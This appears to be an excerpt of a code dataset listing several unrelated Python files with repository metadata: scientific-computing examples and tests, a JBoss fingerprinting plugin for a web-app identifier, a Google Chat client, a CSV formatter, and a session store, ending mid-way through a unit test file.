G = wemrr.free_energy(K,t,milestones,radial=True)
print(G)
#===================================================
#Compute MFPT with error bars
#===================================================
N_total = 300
interval = 10
K_list = wemrr.Monte_Carlo_bootstrapping(N_total,K,t,Nhit,interval)
print(K_list)
mfpt_list = []
for i in range(len(K_list)):
mfpt_list.append(wemrr.MFPT(K_list[i],t,1,5))
mfpt_list = np.array(mfpt_list)
mfpt_mean = np.mean(mfpt_list)
mfpt_std = np.std(mfpt_list)
mfpt_err = 1.96*mfpt_std #95% confidence interval
print("Mean First Passage Time = ",mfpt_mean," +/- ",mfpt_err)
| 25.8 | 67 | 0.534884 | #THIS CODE IS AN EXAMPLE HOW TO COMPUTE VARIOUS PROPERTIES
import numpy as np
import wemrr
milestones = [2.45,2.7,3.5,4.5,5.5,7.0,9.0]
#==================================================
#Compute steady state K and mean first passage time
#===================================================
K,t,Nhit = wemrr.compute_kernel(milestones)
#MFPT from r=2.7 to r=7.0
print(wemrr.MFPT(K,t,1,5))
#==================================================
#Compute equilibrium K and free energy profile
#===================================================
G = wemrr.free_energy(K,t,milestones,radial=True)
print(G)
#===================================================
#Compute MFPT with error bars
#===================================================
N_total = 300
interval = 10
K_list = wemrr.Monte_Carlo_bootstrapping(N_total,K,t,Nhit,interval)
print(K_list)
mfpt_list = []
for i in range(len(K_list)):
mfpt_list.append(wemrr.MFPT(K_list[i],t,1,5))
mfpt_list = np.array(mfpt_list)
mfpt_mean = np.mean(mfpt_list)
mfpt_std = np.std(mfpt_list)
mfpt_err = 1.96*mfpt_std #95% confidence interval
print("Mean First Passage Time = ",mfpt_mean," +/- ",mfpt_err)
| 0 | 0 | 0 |
bafe4c8ca292b8f5e70f126e35e44deb24859a0f | 856 | py | Python | plugins/jboss.py | antoniotrento/wig | f43cc8c79444b8dd31111dc08d9426c305d7c827 | [
"BSD-2-Clause"
] | 3 | 2019-03-24T16:59:40.000Z | 2021-04-07T16:09:38.000Z | plugins/jboss.py | ustayready/wig | cff1a6c42dd4d4565b8f147c208b46edb314b697 | [
"BSD-2-Clause"
] | null | null | null | plugins/jboss.py | ustayready/wig | cff1a6c42dd4d4565b8f147c208b46edb314b697 | [
"BSD-2-Clause"
] | 2 | 2017-08-26T22:58:05.000Z | 2020-11-20T10:27:13.000Z | from classes.specializedRequesters import CMSReqMD5, CMSReqString, CMSReqRegex
| 27.612903 | 78 | 0.713785 | from classes.specializedRequesters import CMSReqMD5, CMSReqString, CMSReqRegex
class JBossMD5(CMSReqMD5):
def __init__(self, host, cache, results):
super().__init__(host, cache, results)
self.name = "JBoss"
self.prefix = [""]
self.data_file = "data/cms/md5/jboss.json"
class JBossString(CMSReqString):
def __init__(self, host, cache, results):
super().__init__(host, cache, results)
self.name = "JBoss"
self.prefix = [""]
self.data_file = "data/cms/string/jboss.json"
class JBossRegex(CMSReqRegex):
def __init__(self, host, cache, results):
super().__init__(host, cache, results)
self.name = "JBoss"
self.prefix = [""]
self.data_file = "data/cms/regex/jboss.json"
def get_instances(host, cache, results):
return [
JBossMD5(host, cache, results),
JBossString(host, cache, results),
JBossRegex(host, cache, results)
]
| 590 | 25 | 161 |
beb7612925a2daf6ba5024db5d6e7aa1ba05d20c | 1,018 | py | Python | youtubedataSaveToCSV.py | eddieir/youtube_analysis | 21ccb15c7214d9a203b4d6e6848a36d250835b98 | [
"MIT"
] | 7 | 2018-12-08T13:57:29.000Z | 2021-04-06T17:02:50.000Z | youtubedataSaveToCSV.py | eddieir/youtube_analysis | 21ccb15c7214d9a203b4d6e6848a36d250835b98 | [
"MIT"
] | null | null | null | youtubedataSaveToCSV.py | eddieir/youtube_analysis | 21ccb15c7214d9a203b4d6e6848a36d250835b98 | [
"MIT"
] | 1 | 2018-12-08T13:57:35.000Z | 2018-12-08T13:57:35.000Z | import requests
import pandas as pd
import numpy as np
from bs4 import BeautifulSoup
import csv
data = []
with open('you.csv') as csvfile:
reader = csv.reader(csvfile)
next(reader)
datum = {}
for idx, row in enumerate(reader):
mod = (idx % 6)
if mod < 5:
if mod == 0:
datum['grade'] = str(row[0])
elif mod == 1:
datum['channel'] = str(row[0])
elif mod == 2:
datum['uploads'] = int(row[0].replace(
',', '')) if row[0] != '--' else 0
elif mod == 3:
datum['subscribers'] = int(row[0].replace(
',', '')) if row[0] != '--' else 0
elif mod == 4:
datum['views'] = int(row[0].replace(
',', '')) if row[0] != '--' else 0
else:
data.append(datum)
datum = {}
df = pd.DataFrame(data)
df.head()
df.to_csv('formatted_youtube_data.csv')
#print (idx, row)
| 28.277778 | 58 | 0.452849 | import requests
import pandas as pd
import numpy as np
from bs4 import BeautifulSoup
import csv
data = []
with open('you.csv') as csvfile:
reader = csv.reader(csvfile)
next(reader)
datum = {}
for idx, row in enumerate(reader):
mod = (idx % 6)
if mod < 5:
if mod == 0:
datum['grade'] = str(row[0])
elif mod == 1:
datum['channel'] = str(row[0])
elif mod == 2:
datum['uploads'] = int(row[0].replace(
',', '')) if row[0] != '--' else 0
elif mod == 3:
datum['subscribers'] = int(row[0].replace(
',', '')) if row[0] != '--' else 0
elif mod == 4:
datum['views'] = int(row[0].replace(
',', '')) if row[0] != '--' else 0
else:
data.append(datum)
datum = {}
df = pd.DataFrame(data)
df.head()
df.to_csv('formatted_youtube_data.csv')
#print (idx, row)
| 0 | 0 | 0 |
d14b679b3f228823b713d182245105a9b779c4e8 | 59 | py | Python | social/backends/eveonline.py | raccoongang/python-social-auth | 81c0a542d158772bd3486d31834c10af5d5f08b0 | [
"BSD-3-Clause"
] | 1,987 | 2015-01-01T16:12:45.000Z | 2022-03-29T14:24:25.000Z | social/backends/eveonline.py | raccoongang/python-social-auth | 81c0a542d158772bd3486d31834c10af5d5f08b0 | [
"BSD-3-Clause"
] | 731 | 2015-01-01T22:55:25.000Z | 2022-03-10T15:07:51.000Z | virtual/lib/python3.6/site-packages/social/backends/eveonline.py | dennismwaniki67/awards | 80ed10541f5f751aee5f8285ab1ad54cfecba95f | [
"MIT"
] | 1,082 | 2015-01-01T16:27:26.000Z | 2022-03-22T21:18:33.000Z | from social_core.backends.eveonline import EVEOnlineOAuth2
| 29.5 | 58 | 0.898305 | from social_core.backends.eveonline import EVEOnlineOAuth2
| 0 | 0 | 0 |
c5036a969593407a06322d81489d228e094221fd | 3,631 | py | Python | dreambeam/telescopes/rt.py | creaneroDIAS/dreamBeam | b7345744b87648126193fb7e81c8519a4e66d20d | [
"ISC"
] | null | null | null | dreambeam/telescopes/rt.py | creaneroDIAS/dreamBeam | b7345744b87648126193fb7e81c8519a4e66d20d | [
"ISC"
] | null | null | null | dreambeam/telescopes/rt.py | creaneroDIAS/dreamBeam | b7345744b87648126193fb7e81c8519a4e66d20d | [
"ISC"
] | null | null | null | """rt (i.e. Radio Telescopes) module is for handling real telescope meta-data."""
import os
import glob
import pickle
import dreambeam.telescopes
class TelescopeBndStn(object):
"""Model of one station and one band of a telescope."""
feed_pat = None
def __init__(self, stnPos, stnRot):
"""Set the station's position and attitude."""
self.stnPos = stnPos
self.stnRot = stnRot
def getEJones(self):
"""Create ejones for station based on antenna patterns."""
ejones = None
return ejones
class TelescopesWiz():
"""Database over available telescopes patterns."""
def telbndmdl2dirfile(self, tscopename, band, beammodel):
"""Map tscopename, band, beammodel tuple to file-path. file-path is a tuple
of (absolute_directory, filename), where
absolute_directory=/path-to-telescopes/TELESCOPENAME/data/
and
filename BAND_MODEL.teldat.p"""
metadata_dir = "data/" #subdir within telescope dir with telbnd metadata.
#Currently it only maps requests to filename
tbdata_fname = band+"_"+beammodel+".teldat.p"
tbdata_dir = self.telescopes_dir+"/"+tscopename+"/"+metadata_dir
return tbdata_dir, tbdata_fname
| 38.62766 | 87 | 0.599284 | """rt (i.e. Radio Telescopes) module is for handling real telescope meta-data."""
import os
import glob
import pickle
import dreambeam.telescopes
class TelescopeBndStn(object):
"""Model of one station and one band of a telescope."""
feed_pat = None
def __init__(self, stnPos, stnRot):
"""Set the station's position and attitude."""
self.stnPos = stnPos
self.stnRot = stnRot
def getEJones(self):
"""Create ejones for station based on antenna patterns."""
ejones = None
return ejones
class TelescopesWiz():
"""Database over available telescopes patterns."""
def __init__(self):
#Register telescope experts
self.telescopes_dir = os.path.dirname(dreambeam.telescopes.__file__)
ls = os.listdir(self.telescopes_dir)
ds = []
for p in ls:
if os.path.isdir(self.telescopes_dir+'/'+p):
ds.append(p)
self.tbdata = {}
for dd in ds:
tbdata_dir = self.telbndmdl2dirfile(dd, '', '')[0]
if os.path.isdir(tbdata_dir):
t = os.path.basename(dd)
self.tbdata[t] = {}
#Find bands & models per telescope
for tel in self.tbdata.keys():
teldat_path = self.telbndmdl2dirfile(tel, '', '')[0]
tbfiles = glob.glob(teldat_path+'*_*.teldat.p')
bands = []
antmodels = []
for tbfile in tbfiles:
filename = os.path.basename(tbfile)
(band, modelsuffix)=filename.split('_')
bands.append(band)
antmodel=modelsuffix.split('.',2)[0]
antmodels.append(antmodel)
self.tbdata[tel] = {}
for band in bands:
self.tbdata[tel][band] = {}
for antmodel in antmodels:
self.tbdata[tel][band][antmodel] = {}
#Find stations for telescope band antmodel:
for tel in self.tbdata.keys():
for band in self.tbdata[tel].keys():
for beammodel in self.tbdata[tel][band].keys():
telbnddata = self.getTelescopeBand(tel, band, beammodel)
self.tbdata[tel][band][antmodel] = telbnddata['Station'].keys()
def get_telescopes(self):
return self.tbdata.keys()
def get_bands(self, telescope):
return self.tbdata[telescope].keys()
def get_stations(self, telescope, band):
abeammodel = self.tbdata[telescope][band].keys()[0]
return self.tbdata[telescope][band][abeammodel]
def get_beammodels(self, telescope, band):
return self.tbdata[telescope][band].keys()
def getTelescopeBand(self, tscopename, band, beammodel):
tbdata_dir, tbdata_fname = self.telbndmdl2dirfile(tscopename, band, beammodel)
tbdata_path = tbdata_dir+tbdata_fname
with open(tbdata_path,'rb') as f:
telbnddata = pickle.load(f)
return telbnddata
def telbndmdl2dirfile(self, tscopename, band, beammodel):
"""Map tscopename, band, beammodel tuple to file-path. file-path is a tuple
of (absolute_directory, filename), where
absolute_directory=/path-to-telescopes/TELESCOPENAME/data/
and
filename BAND_MODEL.teldat.p"""
metadata_dir = "data/" #subdir within telescope dir with telbnd metadata.
#Currently it only maps requests to filename
tbdata_fname = band+"_"+beammodel+".teldat.p"
tbdata_dir = self.telescopes_dir+"/"+tscopename+"/"+metadata_dir
return tbdata_dir, tbdata_fname
| 2,191 | 0 | 177 |
d6e621b3be8e3fb18373df6cf7bc97c51fa5816f | 8,883 | py | Python | gcp_pilot/chats.py | guilacerda/gcp-pilot | b31a7d4cd2de94a57c928c024e8f5b074f628224 | [
"Apache-2.0"
] | null | null | null | gcp_pilot/chats.py | guilacerda/gcp-pilot | b31a7d4cd2de94a57c928c024e8f5b074f628224 | [
"Apache-2.0"
] | 16 | 2021-01-11T00:59:42.000Z | 2022-03-29T18:34:55.000Z | gcp_pilot/chats.py | guilacerda/gcp-pilot | b31a7d4cd2de94a57c928c024e8f5b074f628224 | [
"Apache-2.0"
] | 1 | 2021-09-17T05:38:41.000Z | 2021-09-17T05:38:41.000Z | import json
from dataclasses import field, dataclass
from typing import List, Dict, Generator
import requests
from gcp_pilot import exceptions
from gcp_pilot.base import GoogleCloudPilotAPI, DiscoveryMixin, ResourceType
@dataclass
@dataclass
__all__ = (
"Text",
"Section",
"Card",
"ChatsBot",
"ChatsHook",
)
| 27.165138 | 110 | 0.573117 | import json
from dataclasses import field, dataclass
from typing import List, Dict, Generator
import requests
from gcp_pilot import exceptions
from gcp_pilot.base import GoogleCloudPilotAPI, DiscoveryMixin, ResourceType
class Text:
@classmethod
def build_mention(cls, member_id: str = "all") -> str:
return f"<users/{member_id}>"
@classmethod
def build_link(cls, url: str, text: str) -> str:
return f"<{url}|{text}>"
@classmethod
def format_color(cls, hex_color: str, text: str) -> str:
return f'<font color="#{hex_color}">{text}</font>'
class Widget(dict):
_key = None
def as_data(self):
if self._key:
return {self._key: dict(self)}
return dict(self)
class ButtonWidget(Widget):
def __init__(self, url, text: str = None, image_url: str = None, icon: str = None):
super().__init__()
if text:
self._key = "textButton"
self["text"] = text
elif image_url:
self._key = "imageButton"
self["iconUrl"] = image_url
elif icon:
self._key = "imageButton"
self["icon"] = icon
else:
raise exceptions.UnsupportedFormatException("A button must have a text, image or icon")
self["onClick"] = {
"openLink": {
"url": url,
}
}
class ButtonGroupWidget(Widget):
_key = "buttons"
def __init__(self, buttons):
data = dict(
buttons=buttons,
)
super().__init__(data)
def as_data(self):
return {self._key: [button.as_data() for button in self["buttons"]]}
class OnClickWidget(Widget):
_key = "onClick"
def __init__(self, url):
data = dict(openLink=dict(url=url))
super().__init__(data)
class KeyValueWidget(Widget):
_key = "keyValue"
def __init__(
self,
content: str,
top: str = None,
bottom: str = None,
break_lines: bool = True,
on_click: OnClickWidget = None,
icon: str = None,
button: ButtonWidget = None,
):
data = dict(
content=content,
contentMultiline="true" if break_lines else "false",
)
if top:
data["topLabel"] = top
if bottom:
data["bottomLabel"] = bottom
if on_click:
data["onClick"] = on_click
if icon:
data["icon"] = icon
if button:
data["button"] = button
super().__init__(data)
class TextWidget(Widget):
_key = "textParagraph"
def __init__(self, text: str):
super().__init__(text=text)
class ImageWidget(Widget):
_key = "image"
def __init__(self, image_url: str, on_click: OnClickWidget = None):
data = dict(imageUrl=image_url)
if on_click:
data.update(on_click.as_data())
super().__init__(data)
@dataclass
class Section:
header: str = None
widgets: List[Widget] = field(default_factory=list)
def add_header(self, text: str):
self.header = text
def add_text(
self,
content: str,
title: str = "",
footer: str = "",
click_url: str = None,
icon: str = None,
button: str = None,
):
widget = KeyValueWidget(
top=title,
content=content,
break_lines=True,
bottom=footer,
on_click=OnClickWidget(url=click_url) if click_url else None,
icon=icon,
button=button,
)
self.widgets.append(widget)
def add_paragraph(self, text: str):
self.widgets.append(TextWidget(text=text))
def add_button(self, url, text: str = None, image_url: str = None, icon: str = None, append: bool = True):
button = ButtonWidget(url=url, text=text, image_url=image_url, icon=icon)
if append and self.widgets and "buttons" in self.widgets[-1]:
self.widgets[-1]["buttons"].append(button)
else:
self.widgets.append(ButtonGroupWidget(buttons=[button]))
def add_image(self, image_url: str, click_url: str = None):
widget = ImageWidget(
image_url=image_url,
on_click=OnClickWidget(url=click_url) if click_url else None,
)
self.widgets.append(widget)
def as_data(self):
data = {
"widgets": [widget.as_data() for widget in self.widgets],
}
if self.header:
data["header"] = self.header
return data
def __bool__(self):
return self.header is not None or bool(self.widgets)
@dataclass
class Card:
header: Widget = None
sections: List[Section] = field(default_factory=list)
def add_header(self, title: str, subtitle: str = "", image_url: str = None, style: str = "IMAGE"):
self.header = Widget(
title=title,
subtitle=subtitle,
imageUrl=image_url,
imageStyle=style,
)
def add_section(self, section: Section):
if bool(section):
self.sections.append(section)
def as_data(self) -> Dict:
data = {"sections": [section.as_data() for section in self.sections]}
if self.header:
data["header"] = self.header.as_data()
return data
class ChatsHook:
def __init__(self, hook_url: str):
self.hook_url = hook_url
def _post(self, body: Dict, thread_key: str = None) -> Dict:
url = self.hook_url
if thread_key:
url = f"{url}&threadKey={thread_key}"
response = requests.post(
url=url,
headers={"Content-Type": "application/json; charset=UTF-8"},
data=json.dumps(body),
)
response.raise_for_status()
return response.json()
def send_text(self, text: str, thread_key: str = None) -> Dict:
body = {"text": text}
return self._post(body=body, thread_key=thread_key)
def send_card(self, card: Card, additional_text: str = None, thread_key: str = None) -> Dict:
body = {
"cards": [card.as_data()],
}
if additional_text:
body["text"] = additional_text
return self._post(body=body, thread_key=thread_key)
class ChatsBot(DiscoveryMixin, GoogleCloudPilotAPI):
_scopes = ["https://www.googleapis.com/auth/chat.bot"]
def __init__(self, **kwargs):
super().__init__(
serviceName="chat",
version="v1",
cache_discovery=False,
**kwargs,
)
def _room_path(self, room_id: str) -> str:
prefix = "spaces/"
if not room_id.startswith(prefix):
room_path = f"{prefix}{room_id}"
else:
room_path = room_id
return room_path
def _member_path(self, room_id: str, member_id: str) -> str:
room_path = self._room_path(room_id=room_id)
prefix = "members/"
if not member_id.startswith(prefix):
member_path = f"{prefix}{member_id}"
else:
member_path = member_id
return f"{room_path}/{member_path}"
def get_room(self, room_id: str) -> ResourceType:
return self._execute(
method=self.client.spaces().get,
name=self._room_path(room_id=room_id),
)
def get_rooms(self) -> Generator[ResourceType, None, None]:
yield from self._paginate(
method=self.client.spaces().list,
result_key="spaces",
)
def get_member(self, room_id: str, member_id: str) -> ResourceType:
name = self._member_path(room_id=room_id, member_id=member_id)
return self._execute(
method=self.client.spaces().members().get,
name=name,
)
def get_members(self, room_id: str) -> Generator[ResourceType, None, None]:
yield from self._paginate(
method=self.client.spaces().members().list,
result_key="memberships",
params={"parent": self._room_path(room_id=room_id)},
)
def send_text(self, room_id: str, text: str) -> ResourceType:
body = {"text": text}
return self._execute(
method=self.client.spaces().messages().create,
parent=self._room_path(room_id=room_id),
body=body,
)
def send_card(self, room_id: str, card: Card, additional_text: str = None) -> ResourceType:
body = {
"cards": [card.as_data()],
}
if additional_text:
body["text"] = additional_text
return self._execute(
method=self.client.spaces().messages().create,
parent=self._room_path(room_id=room_id),
body=body,
)
__all__ = (
"Text",
"Section",
"Card",
"ChatsBot",
"ChatsHook",
)
| 6,911 | 1,219 | 407 |
e0e76690facb84505835744d64bbf96b88b0f025 | 1,013 | py | Python | econsa/tests/wrapper_r.py | MargaritaRad/econsa | 12d494067efacc6c2a893dc229bfac2dfce2074b | [
"MIT"
] | 3 | 2020-07-17T15:05:52.000Z | 2020-10-23T06:21:13.000Z | econsa/tests/wrapper_r.py | MargaritaRad/econsa | 12d494067efacc6c2a893dc229bfac2dfce2074b | [
"MIT"
] | 65 | 2020-05-14T13:36:12.000Z | 2021-06-22T15:45:15.000Z | econsa/tests/wrapper_r.py | MargaritaRad/econsa | 12d494067efacc6c2a893dc229bfac2dfce2074b | [
"MIT"
] | 4 | 2020-07-15T13:51:52.000Z | 2021-08-31T06:58:33.000Z | """Wrapping R.
This module contains all functionality related to the use of functions from R for testing purposes.
"""
import numpy as np
import rpy2.robjects.packages as rpackages
from rpy2 import robjects
from rpy2.robjects import numpy2ri
r_package_cond_mvnorm = rpackages.importr("condMVNorm")
def r_cond_mvn(mean, cov, dependent_ind, given_ind, given_value):
"""The original function for `cond_mvn`."""
numpy2ri.activate()
r_mean = robjects.FloatVector(mean)
n = cov.shape[0]
r_cov = robjects.r.matrix(cov, n, n)
r_dependent_ind = robjects.IntVector([x + 1 for x in dependent_ind])
r_given_ind = robjects.IntVector([x + 1 for x in given_ind])
r_given_value = robjects.FloatVector(given_value)
args = (r_mean, r_cov, r_dependent_ind, r_given_ind, r_given_value)
r_cond_mean, r_cond_cov = r_package_cond_mvnorm.condMVN(*args)
r_cond_mean, r_cond_cov = np.array(r_cond_mean), np.array(r_cond_cov)
numpy2ri.deactivate()
return r_cond_mean, r_cond_cov
| 31.65625 | 99 | 0.745311 | """Wrapping R.
This module contains all functionality related to the use of functions from R for testing purposes.
"""
import numpy as np
import rpy2.robjects.packages as rpackages
from rpy2 import robjects
from rpy2.robjects import numpy2ri
r_package_cond_mvnorm = rpackages.importr("condMVNorm")
def r_cond_mvn(mean, cov, dependent_ind, given_ind, given_value):
"""The original function for `cond_mvn`."""
numpy2ri.activate()
r_mean = robjects.FloatVector(mean)
n = cov.shape[0]
r_cov = robjects.r.matrix(cov, n, n)
r_dependent_ind = robjects.IntVector([x + 1 for x in dependent_ind])
r_given_ind = robjects.IntVector([x + 1 for x in given_ind])
r_given_value = robjects.FloatVector(given_value)
args = (r_mean, r_cov, r_dependent_ind, r_given_ind, r_given_value)
r_cond_mean, r_cond_cov = r_package_cond_mvnorm.condMVN(*args)
r_cond_mean, r_cond_cov = np.array(r_cond_mean), np.array(r_cond_cov)
numpy2ri.deactivate()
return r_cond_mean, r_cond_cov
| 0 | 0 | 0 |
c5b851f4b324c30f3518d4ceac9a33ec3c88fe3c | 2,277 | py | Python | izi/store.py | izi-global/izir | d1a4bfb5c082c3de1956402ef0280564014a3bd8 | [
"MIT"
] | null | null | null | izi/store.py | izi-global/izir | d1a4bfb5c082c3de1956402ef0280564014a3bd8 | [
"MIT"
] | 5 | 2021-03-18T21:01:05.000Z | 2022-03-11T23:29:48.000Z | izi/store.py | izi-global/izir | d1a4bfb5c082c3de1956402ef0280564014a3bd8 | [
"MIT"
] | null | null | null | """izi/store.py.
A collecton of native stores which can be used with, among others, the session middleware.
Copyright (C) 2018 DiepDT-IZIGlobal
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
from izi.exceptions import StoreKeyNotFound
class InMemoryStore:
"""
Naive store class which can be used for the session middleware and unit tests.
It is not thread-safe and no data will survive the lifecycle of the izi process.
Regard this as a blueprint for more useful and probably more complex store implementations, for example stores
which make use of databases like Redis, PostgreSQL or others.
"""
def get(self, key):
"""Get data for given store key. Raise izi.exceptions.StoreKeyNotFound if key does not exist."""
try:
data = self._data[key]
except KeyError:
raise StoreKeyNotFound(key)
return data
def exists(self, key):
"""Return whether key exists or not."""
return key in self._data
def set(self, key, data):
"""Set data object for given store key."""
self._data[key] = data
def delete(self, key):
"""Delete data for given store key."""
if key in self._data:
del self._data[key]
| 41.4 | 114 | 0.721124 | """izi/store.py.
A collecton of native stores which can be used with, among others, the session middleware.
Copyright (C) 2018 DiepDT-IZIGlobal
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
from izi.exceptions import StoreKeyNotFound
class InMemoryStore:
"""
Naive store class which can be used for the session middleware and unit tests.
It is not thread-safe and no data will survive the lifecycle of the izi process.
Regard this as a blueprint for more useful and probably more complex store implementations, for example stores
which make use of databases like Redis, PostgreSQL or others.
"""
def __init__(self):
self._data = {}
def get(self, key):
"""Get data for given store key. Raise izi.exceptions.StoreKeyNotFound if key does not exist."""
try:
data = self._data[key]
except KeyError:
raise StoreKeyNotFound(key)
return data
def exists(self, key):
"""Return whether key exists or not."""
return key in self._data
def set(self, key, data):
"""Set data object for given store key."""
self._data[key] = data
def delete(self, key):
"""Delete data for given store key."""
if key in self._data:
del self._data[key]
| 22 | 0 | 26 |
bd041f5740993491e2644cba5876f694e23dc1d4 | 5,722 | py | Python | tests/test_photons.py | ruicamposcolabpt/MontyCarlo | 8f9e7af78f010f44fda81a4ab064e32421a205f9 | [
"MIT"
] | null | null | null | tests/test_photons.py | ruicamposcolabpt/MontyCarlo | 8f9e7af78f010f44fda81a4ab064e32421a205f9 | [
"MIT"
] | null | null | null | tests/test_photons.py | ruicamposcolabpt/MontyCarlo | 8f9e7af78f010f44fda81a4ab064e32421a205f9 | [
"MIT"
] | null | null | null | __doc__ = """Unit-testing the `.tools` package.
"""
__author__ = "Rui Campos"
import _cmd
import sys
del sys.argv[1]
import numpy as np
import unittest as ut
# Importing
from MontyCarlo.types import PySTATE
from MontyCarlo.particles.photons import python_hooks
Photon = python_hooks.Photon
class input_val:
"""A namespace indicating input values.
"""
pass
class ground_truth:
"""A namespace indicating groundtruth.
"""
pass
class output_val:
"""A namespace indicating calculated values.
"""
pass
class test_Photon(ut.TestCase):
"""Unit testing photons.
"""
# A basic set-up for holding one particle -----------------------
print("SETTING UP")
from MontyCarlo.geometry.CSG import Sphere
from MontyCarlo.geometry.CSG import InfiniteVolume
from MontyCarlo.materials.materials import Mat
from MontyCarlo._init import eax
print("Creating photon...")
photon = Photon()
print("Creating water...")
water = Mat({1:2, 8:1}, 1)
print("Creating geometry...")
with InfiniteVolume() as OUTER:
OUTER.fill(water)
OUTER.configure("no_name", render = False)
with Sphere(1) as sphere:
sphere in OUTER
sphere.fill(water)
sphere.configure("no_name", render = False)
print("Setting current region...")
photon.current_region = sphere
print("UPDATING")
photon.update_references()
photon.update_imfp()
print("DONE. STARTING TESTS")
# ----------------------------------------------------------------
def test_updates(self):
"""Checks for segmentation errors when calling update methods.
"""
print("\n\nTESTING UPDATES")
cls = test_Photon
cls.photon.update_references()
cls.photon.update_imfp()
if __name__ == '__main__':
ut.main()
| 26.86385 | 87 | 0.534254 | __doc__ = """Unit-testing the `.tools` package.
"""
__author__ = "Rui Campos"
import _cmd
import sys
del sys.argv[1]
import numpy as np
import unittest as ut
# Importing
from MontyCarlo.types import PySTATE
from MontyCarlo.particles.photons import python_hooks
Photon = python_hooks.Photon
class input_val:
"""A namespace indicating input values.
"""
pass
class ground_truth:
"""A namespace indicating groundtruth.
"""
pass
class output_val:
"""A namespace indicating calculated values.
"""
pass
class test_Photon(ut.TestCase):
"""Unit testing photons.
"""
# A basic set-up for holding one particle -----------------------
print("SETTING UP")
from MontyCarlo.geometry.CSG import Sphere
from MontyCarlo.geometry.CSG import InfiniteVolume
from MontyCarlo.materials.materials import Mat
from MontyCarlo._init import eax
print("Creating photon...")
photon = Photon()
print("Creating water...")
water = Mat({1:2, 8:1}, 1)
print("Creating geometry...")
with InfiniteVolume() as OUTER:
OUTER.fill(water)
OUTER.configure("no_name", render = False)
with Sphere(1) as sphere:
sphere in OUTER
sphere.fill(water)
sphere.configure("no_name", render = False)
print("Setting current region...")
photon.current_region = sphere
print("UPDATING")
photon.update_references()
photon.update_imfp()
print("DONE. STARTING TESTS")
# ----------------------------------------------------------------
def test_updates(self):
"""Checks for segmentation errors when calling update methods.
"""
print("\n\nTESTING UPDATES")
cls = test_Photon
cls.photon.update_references()
cls.photon.update_imfp()
def test_find_index(self):
print("\n\n TESTING `find_index`")
cls = test_Photon
import numpy.random as npr
photon = cls.photon
eax = cls.eax
N = len(eax) - 1
points = [1e3, 1.1e3, 1e4, 1e5, 1e6, 1e7, 1e8, 1.9e8, 1e9, ]
for E0, Ef in zip(points[:-1], points[1:]):
print(f"Testing `find_index` in range [{E0}, {Ef}]")
for i in range(50_000):
E = E0 + npr.rand()*(Ef - E0)
photon.E = E
i = photon.find_index()
error_msg = f"""
INVALID INDEX
--------------
photon.find_index() failed for E = {E} eV.
It found index i = {i}. Which is out of range for the array `eax`.
"""
self.assertTrue(0 <= i <= N, msg = error_msg)
error_msg = f"""
FOUND WRONG INDEX
-----------------
photon.find_index() failed for E = {E}eV.
It found index i = {i}. Corresponding to the following interval:
{eax[i]} <= {E} < {eax[i+1]}
Note: eax[i] <= E < eax[i+1]
"""
self.assertTrue( eax[i] <= E < eax[i+1], msg = error_msg)
#print(f"SUCCESS: {eax[i]} <= {E} < {eax[i+1]}")
def test_compton(self):
print("\n\nTESTING INCOHERENT")
from collections import deque
cls = test_Photon
photon = cls.photon
print("Seeding photon:")
photon.set_seed(1234)
points = [1e3, 1.1e3, 1e4, 1e5, 1e6, 1e7, 1e8, 1.9e8, 1e9 ]
for E in points:
print(f"Running `_incoherent` for energy {E}eV")
photon.k = E/0.5110e6
photon.E = E
photon.secondary = deque()
photon._incoherent()
def test_coherent(self):
print("\n\nTESTING COHERENT")
cls = test_Photon
photon = cls.photon
print("Seeding photon:")
photon.set_seed(1234)
points = [1e3, 1.1e3, 1e4, 1e5, 1e6, 1e7, 1e8, 1.9e8, 1e9 ]
for E in points:
print(f"Running `_coherent` for energy {E}eV")
k = E/0.5110e6
photon.k = E/0.5110e6
photon._coherent()
self.assertEqual(photon.k, k, msg = "Coherent is not conserving energy...")
def test_photoelectric(self):
print("\n\nTESTING photoelectric")
cls = test_Photon
photon = cls.photon
print("Seeding photon:")
photon.set_seed(1234)
points = [1e3, 1.1e3, 1e4, 1e5, 1e6, 1e7, 1e8, 1.9e8, 1e9 ]
for E in points:
print(f"Running `_photoelectric` for energy {E}eV")
k = E/0.5110e6
photon.k = E/0.5110e6
photon._photoelectric()
def test_pairproduction(self):
print("\n\nTESTING `_pairproduction`")
cls = test_Photon
photon = cls.photon
print("Seeding photon:")
photon.set_seed(1234)
points = [1e3, 1.1e3, 1e4, 1e5, 1e6, 1e7, 1e8, 1.9e8, 1e9 ]
for E in points:
print(f"Running `_pairproduction` for energy {E}eV")
k = E/0.5110e6
photon.k = E/0.5110e6
photon._pairproduction()
def test_tripletproduction(self):
print("\n\nTESTING tripletproduction")
